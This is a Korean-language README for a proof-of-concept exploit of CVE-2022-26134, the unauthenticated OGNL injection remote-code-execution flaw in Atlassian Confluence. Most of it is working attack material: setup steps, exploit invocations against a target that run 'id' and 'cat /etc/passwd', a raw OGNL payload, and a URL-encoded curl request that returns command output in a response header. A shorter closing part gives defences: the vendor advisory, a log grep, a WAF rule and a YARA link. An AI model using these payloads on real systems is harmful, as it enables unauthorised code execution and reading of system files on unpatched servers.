
Atlassian Confluence (CVE-2022-26134) - 인증되지 않은 OGNL 주입 취약점 (RCE)
Atlassian Confluence 7.18 이하 제품에 영향을 미치는 원격 코드 실행 취약점을 악용하는 개념 증명 스크립트입니다. OGNL 주입 취약점을 통해 인증되지 않은 사용자가 Confluence Server 또는 Data Center 인스턴스에서 임의 코드를 실행할 수 있습니다.
지원되는 모든 Confluence Server 및 Data Center 버전이 영향을 받습니다.
1.3.0 이후부터 7.18.1 이하의 Confluence Server 및 Data Center 버전이 영향을 받습니다.
이 취약점은 CVSS 점수 10점 만점에 10점으로 심각도가 가장 높습니다.
pip install -r requirements.txt
저장소를 클론합니다:
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
그런 다음 원하는 명령어로 다음과 같이 익스플로잇을 실행할 수 있습니다:
python3 cve-2022-26134.py https://target.com "id"
python3 cve-2022-26134.py https://target.com "ps aux"
python3 cve-2022-26134.py https://target.com "cat /etc/passwd"
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
그러면 명령 실행 결과가 응답 헤더의 X-Cmd-Response 파라미터에 반영됩니다.
Atlassian의 공식 권장 사항을 따르세요:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian은 이 CVE의 영향을 받는 자사 제품에 대한 권고를 발표했으며, 여기에서 확인할 수 있습니다. 문제를 해결하려면 Confluence 버전을 업그레이드해야 합니다. 공개 시점에 권장된 목록은 다음과 같습니다:
Confluence는 Apache Tomcat 서버이며 로그는 /opt/atlassian/confluence/logs에 있습니다. grep과 같은 명령을 사용하여 Java 런타임을 통해 명령을 실행하는 페이로드의 HTTP GET 요청을 검색할 수 있습니다. 예를 들어:
grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" in catalina.out
이 취약점은 모든 자체 호스팅 인스턴스에 영향을 줍니다. WAF를 사용하는 경우 ${가 포함된 URL을 차단할 수 있습니다.
YARA (by Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
교육 목적으로만 사용하세요.
